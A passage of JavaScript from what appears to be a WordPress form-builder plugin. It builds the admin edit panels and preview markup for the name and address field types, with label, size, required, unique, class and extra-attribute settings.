		el_format_extended.setAttribute("name", "edit_for_name_format");
                el_format_extended.setAttribute("onchange", "format_extended("+i+")");
		Extended = document.createTextNode("Extended");
		
	if(w_name_format=="normal")
	
				el_format_normal.setAttribute("checked", "checked");
	else
				el_format_extended.setAttribute("checked", "checked");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");	

	var el_unique_label = document.createElement('label');
	    el_unique_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_send");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("value", "yes");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_name')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_name')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_name')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_name')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td9.appendChild(el_first_value_label);
	edit_main_td9_1.appendChild(el_first_value_first);
	edit_main_td9_1.appendChild(gic);
	edit_main_td9_1.appendChild(el_first_value_last);
	
	
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	edit_main_td3.appendChild(el_format_label);

	edit_main_td3_1.appendChild(el_format_normal);
	edit_main_td3_1.appendChild(Normal);
	edit_main_td3_1.appendChild(br6);
	edit_main_td3_1.appendChild(el_format_extended);
	edit_main_td3_1.appendChild(Extended);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_name');
	
//show table

	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_name");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
      var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
			edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
      div_for_editable_labels.appendChild(edit_labels);
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");

			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_name = document.createElement('table');
           	table_name.setAttribute("id", i+"_table_name");
           	table_name.setAttribute("cellpadding", '0');
           	table_name.setAttribute("cellspacing", '0');
			
      	var tr_name1 = document.createElement('tr');
           	tr_name1.setAttribute("id", i+"_tr_name1");
			
      	var tr_name2 = document.createElement('tr');
           	tr_name2.setAttribute("id", i+"_tr_name2");
			
      	var td_name_input1 = document.createElement('td');
           	td_name_input1.setAttribute("id", i+"_td_name_input_first");
			
      	var td_name_input2 = document.createElement('td');
           	td_name_input2.setAttribute("id", i+"_td_name_input_last");
		
      	var td_name_label1 = document.createElement('td');
           	td_name_label1.setAttribute("id", i+"_td_name_label_first");
           	td_name_label1.setAttribute("align", "left");
			
      	var td_name_label2 = document.createElement('td');
           	td_name_label2.setAttribute("id", i+"_td_name_label_last");
           	td_name_label2.setAttribute("align", "left");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
	    
      	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";			
	var first = document.createElement('input');
        first.setAttribute("type", 'text');
		if(w_title[0]==w_first_val[0])
			first.setAttribute("class", "input_deactive");
		else
			first.setAttribute("class", "input_active");
		
	    first.style.cssText = "margin-right: 10px; width:"+w_size+"px";
	    first.setAttribute("id", i+"_element_firstform_id_temp");
	    first.setAttribute("name", i+"_element_firstform_id_temp");
		first.setAttribute("value", w_first_val[0]);
		first.setAttribute("title", w_title[0]);
		first.setAttribute("onFocus", 'delete_value("'+i+'_element_firstform_id_temp")');
		first.setAttribute("onBlur", 'return_value("'+i+'_element_firstform_id_temp")');
	    first.setAttribute("onChange", "change_value('"+i+"_element_firstform_id_temp')");
			
	var first_label = document.createElement('label');
	    first_label.setAttribute("class", "mini_label");
	    first_label.setAttribute("id", i+"_mini_label_first");
	    first_label.innerHTML = w_mini_labels[1];
			
	var last = document.createElement('input');
        last.setAttribute("type", 'text');
		
 		if(w_title[1]==w_first_val[1])
			last.setAttribute("class", "input_deactive");
		else
			last.setAttribute("class", "input_active");
			
		last.style.cssText = "margin-right: 10px; width:"+w_size+"px";
		last.setAttribute("id", i+"_element_lastform_id_temp");
	   	last.setAttribute("name", i+"_element_lastform_id_temp");
		last.setAttribute("value", w_first_val[1]);
		last.setAttribute("title", w_title[1]);
		last.setAttribute("onFocus", 'delete_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onBlur", 'return_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onChange", "change_value('"+i+"_element_lastform_id_temp')");


	var last_label = document.createElement('label');
		last_label.setAttribute("class", "mini_label");
		last_label.setAttribute("id", i+"_mini_label_last");
		last_label.innerHTML= w_mini_labels[2];
			
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
		
      	td_name_input1.appendChild(first);
      	td_name_input2.appendChild(last);
      	tr_name1.appendChild(td_name_input1);
      	tr_name1.appendChild(td_name_input2);
		
      	td_name_label1.appendChild(first_label);
      	td_name_label2.appendChild(last_label);
      	tr_name2.appendChild(td_name_label1);
      	tr_name2.appendChild(td_name_label2);
      	table_name.appendChild(tr_name1);
      	table_name.appendChild(tr_name2);
		
       	td2.appendChild(adding_type);
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_unique);
    	td2.appendChild(table_name);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
        div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
				label_top(i);
	
	if(w_name_format=="extended")
				format_extended(i);
  change_class(w_class, i);
  refresh_attr(i, 'type_name');
  jQuery(document).ready(function() {
    jQuery("label#"+i+"_mini_label_first").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var first = "<input type='text' class='first' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(first);
        jQuery("input.first").focus();
        jQuery("input.first").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_first").text(value);
        });
      }
    });
    jQuery("label#"+i+"_mini_label_last").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var last = "<input type='text' class='last'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(last);
        jQuery("input.last").focus();
        jQuery("input.last").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+i+"_mini_label_last").text(value);
        });
      }
    });
	});
}

function type_address(i, w_field_label, w_field_label_pos, w_size, w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value) {
	document.getElementById("element_type").value="type_address";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
		
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
		
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else

				el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Overall size(px) ";
	var el_size = document.createElement('input');
		   el_size.setAttribute("id", "edit_for_input_size");
		   el_size.setAttribute("type", "text");
		   el_size.setAttribute("value", w_size);
		   
			el_size.setAttribute("name", "edit_for_size");
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_div_address', this.value);");
  var el_disable_field_label = document.createElement('label');
	        el_disable_field_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_disable_field_label.innerHTML = "Disable Field(s)";
	
	
	var el_disable_address1 = document.createElement('input');
            el_disable_address1.setAttribute("id", "el_street1");
            el_disable_address1.setAttribute("type", "checkbox");
            el_disable_address1.setAttribute("value", "no");
            el_disable_address1.setAttribute("onclick", "disable_fields('"+i+"','street1')");
	if(w_disabled_fields[0]=="yes")
                el_disable_address1.setAttribute("checked", "checked");	
	
	var el_disable_address2 = document.createElement('input');
            el_disable_address2.setAttribute("id", "el_street2");
            el_disable_address2.setAttribute("type", "checkbox");
            el_disable_address2.setAttribute("value", "no");
            el_disable_address2.setAttribute("onclick", "disable_fields('"+i+"','street2')");
	if(w_disabled_fields[1]=="yes")
                el_disable_address2.setAttribute("checked", "checked");	
	
	var el_disable_city = document.createElement('input');
            el_disable_city.setAttribute("id", "el_city");
            el_disable_city.setAttribute("type", "checkbox");
            el_disable_city.setAttribute("value", "no");
            el_disable_city.setAttribute("onclick", "disable_fields('"+i+"','city')");
	if(w_disabled_fields[2]=="yes")
                el_disable_city.setAttribute("checked", "checked");	
	
	var el_disable_state = document.createElement('input');
            el_disable_state.setAttribute("id", "el_state");
            el_disable_state.setAttribute("type", "checkbox");
            el_disable_state.setAttribute("value", "no");
            el_disable_state.setAttribute("onclick", "disable_fields('"+i+"','state')");
	if(w_disabled_fields[3]=="yes")
                el_disable_state.setAttribute("checked", "checked");	
	
	var el_disable_postal = document.createElement('input');
            el_disable_postal.setAttribute("id", "el_postal");
            el_disable_postal.setAttribute("type", "checkbox");
            el_disable_postal.setAttribute("value", "no");
            el_disable_postal.setAttribute("onclick", "disable_fields('"+i+"','postal')");
	if(w_disabled_fields[4]=="yes")
                el_disable_postal.setAttribute("checked", "checked");
	
	var el_disable_country = document.createElement('input');
                el_disable_country.setAttribute("id", "el_country");
                el_disable_country.setAttribute("type", "checkbox");
                el_disable_country.setAttribute("value", "no");
                el_disable_country.setAttribute("onclick", "disable_fields('"+i+"','country')");
	if(w_disabled_fields[5]=="yes")
                el_disable_country.setAttribute("checked", "checked");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");	

	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_address')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_address')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_address')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_address')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
  var el_street1 = document.createTextNode(w_mini_labels[0]);
	var el_street2 = document.createTextNode(w_mini_labels[1]);
	var el_city = document.createTextNode(w_mini_labels[2]);
	var el_state = document.createTextNode(w_mini_labels[3]);
	var el_postal = document.createTextNode(w_mini_labels[4]);
	var el_country = document.createTextNode(w_mini_labels[5]);
	
	var el_street1_label = document.createElement('label');
		el_street1_label.setAttribute("id", "el_street1_label");
	
	var el_street2_label = document.createElement('label');
		el_street2_label.setAttribute("id", "el_street2_label");
	
	var el_city_label = document.createElement('label');
		el_city_label.setAttribute("id", "el_city_label");
	
	var el_state_label = document.createElement('label');
		el_state_label.setAttribute("id", "el_state_label");
	
	var el_postal_label = document.createElement('label');
		el_postal_label.setAttribute("id", "el_postal_label");
	
	var el_country_label = document.createElement('label');
		el_country_label.setAttribute("id", "el_country_label");
	
	el_street1_label.appendChild(el_street1);
	el_street2_label.appendChild(el_street2);
	el_city_label.appendChild(el_city);
	el_state_label.appendChild(el_state);
	el_postal_label.appendChild(el_postal);
	el_country_label.appendChild(el_country);
	var br_ = document.createElement('br');
	var br1_ = document.createElement('br');
	var br2_ = document.createElement('br');
	var br3_ = document.createElement('br');
	var br4_ = document.createElement('br');
	var br5_ = document.createElement('br');
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	/*edit_main_td3.appendChild(el_format_label);
	edit_main_td3.appendChild(br5);
	edit_main_td3.appendChild(el_format_normal);
	edit_main_td3.appendChild(Normal);
	edit_main_td3.appendChild(br6);
	edit_main_td3.appendChild(el_format_extended);
	edit_main_td3.appendChild(Extended);*/
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
  edit_main_td8.appendChild(el_disable_field_label);
	edit_main_td8_1.appendChild(el_disable_address1);
	edit_main_td8_1.appendChild(el_street1_label);
	edit_main_td8_1.appendChild(br_);
	edit_main_td8_1.appendChild(el_disable_address2);
	edit_main_td8_1.appendChild(el_street2_label);
	edit_main_td8_1.appendChild(br1_);
	edit_main_td8_1.appendChild(el_disable_city);
	edit_main_td8_1.appendChild(el_city_label);
	edit_main_td8_1.appendChild(br2_);
	edit_main_td8_1.appendChild(el_disable_state);
	edit_main_td8_1.appendChild(el_state_label);
	edit_main_td8_1.appendChild(br3_);
	edit_main_td8_1.appendChild(el_disable_postal);
	edit_main_td8_1.appendChild(el_postal_label);
	edit_main_td8_1.appendChild(br4_);
	edit_main_td8_1.appendChild(el_disable_country);
	edit_main_td8_1.appendChild(el_country_label);
	edit_main_td8_1.appendChild(br5_);
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	//edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
